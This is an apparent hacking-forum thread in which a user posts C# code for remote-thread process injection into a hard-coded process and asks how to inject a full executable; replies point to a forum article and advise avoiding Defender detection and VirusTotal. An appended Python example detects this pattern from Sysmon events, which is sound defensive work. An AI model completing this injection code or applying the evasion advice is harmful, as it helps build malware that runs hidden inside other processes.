Pe Injection

Ghostmela

Hello everyone, I am trying to understand how PE injection works... The code below works fine if I use a shellcode as the payload, but when I use an exe file it doesn't work. I have an idea of converting the payload to base64 and then seeing if I can load it, but I haven't tried yet. I will be happy if someone puts me through on this or helps me moderate the code to achieve what I want. Thanks in advance.


using System;
using System.Runtime.InteropServices;

namespace PE_Inject
{
    class Program
    {
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);

        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        [DllImport("kernel32.dll")]
        static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, string lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);

        [DllImport("kernel32.dll")]
        static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        [STAThread]
        static void Main(string[] args)
        {
            // 0x001F0FFF is the access mask requested on the target; 4804 is a hard-coded PID.
            IntPtr hProcess = OpenProcess(0x001F0FFF, false, 4804);
            // 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
            IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40);

            string file = "HelloWorld.exe"; // payload
            IntPtr outSize;

            WriteProcessMemory(hProcess, addr, file, file.Length, out outSize);

            IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
        }
    }
}
 
In short, you are executing your code in the memory of another process. You have to allocate memory, write your shellcode and execute it.
You should learn about the PE format first and how it's mapped in memory. Then you can start playing with memory manipulation and other things.
 
Thank you. I really need to spend time on this. If you have a link or an article to read to understand this better in C#, that will also be great.
 
https://xss.pro/threads/42999/ - this article was good as far as I remember; you can use Google to translate it to English or your native language.
 
Alright, I don't know, I have seen this exact same code somewhere and it's fully detected by Windows Defender. Anyways, I will really encourage you to write your own code, and remember, don't use VirusTotal.
Yeah, you're right. Got it from offensive service pen 300 course.
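
The call sequence in the posted code (OpenProcess with 0x001F0FFF, then VirtualAllocEx, WriteProcessMemory and CreateRemoteThread) produces telemetry a defender can correlate. The following is an added example, not part of the original posts: a Python correlation over constructed events modelled on Sysmon Event ID 10 (ProcessAccess) and Event ID 8 (CreateRemoteThread). The event dictionaries, the 10-second window, the "-" marker for an unresolved module and the name find_injections are assumptions.

```python
from datetime import datetime, timedelta

# Access-mask bits the posted code relies on (its 0x001F0FFF contains all three):
# PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE
INJECT_RIGHTS = 0x0002 | 0x0008 | 0x0020
WINDOW = timedelta(seconds=10)   # assumed correlation window
UNBACKED = ("", "-")             # assumed rendering of an unresolved StartModule

# Constructed sample events (not real telemetry), simplified from Sysmon fields.
EVENTS = [
    {"id": 10, "time": "2024-01-01 10:00:00", "SourceProcessId": 7120,
     "TargetProcessId": 4804, "GrantedAccess": "0x1F0FFF"},
    {"id": 8, "time": "2024-01-01 10:00:01", "SourceProcessId": 7120,
     "TargetProcessId": 4804, "StartAddress": "0x000001D2A4B10000", "StartModule": "-"},
    # Query-only handle: the later remote thread has no write-capable handle to pair with.
    {"id": 10, "time": "2024-01-01 10:05:00", "SourceProcessId": 900,
     "TargetProcessId": 4804, "GrantedAccess": "0x1000"},
    {"id": 8, "time": "2024-01-01 10:05:01", "SourceProcessId": 900,
     "TargetProcessId": 4804, "StartAddress": "0x000001D2A4C20000", "StartModule": "-"},
    # Full-access handle, but the thread starts inside a loaded module.
    {"id": 10, "time": "2024-01-01 10:09:00", "SourceProcessId": 612,
     "TargetProcessId": 5200, "GrantedAccess": "0x1FFFFF"},
    {"id": 8, "time": "2024-01-01 10:09:01", "SourceProcessId": 612,
     "TargetProcessId": 5200, "StartAddress": "0x00007FFB1C2A0000",
     "StartModule": r"C:\Windows\System32\kernel32.dll"},
]

def find_injections(events):
    """Pair a write-capable ProcessAccess with a later CreateRemoteThread whose
    start address is not backed by a loaded module."""
    opened = {}  # (source pid, target pid) -> time the handle was granted
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.strptime(ev["time"], "%Y-%m-%d %H:%M:%S")
        key = (ev["SourceProcessId"], ev["TargetProcessId"])
        if ev["id"] == 10:
            if (int(ev["GrantedAccess"], 16) & INJECT_RIGHTS) == INJECT_RIGHTS:
                opened[key] = ts
        elif ev["id"] == 8 and key in opened:
            if ts - opened[key] <= WINDOW and ev.get("StartModule", "") in UNBACKED:
                alerts.append({"source_pid": key[0], "target_pid": key[1],
                               "start_address": ev["StartAddress"]})
    return alerts

if __name__ == "__main__":
    for alert in find_injections(EVENTS):
        print("possible remote-thread injection:", alert)
```

Only the first pair of events is flagged; the other two pairs fail the access-mask check and the unbacked-start-address check respectively.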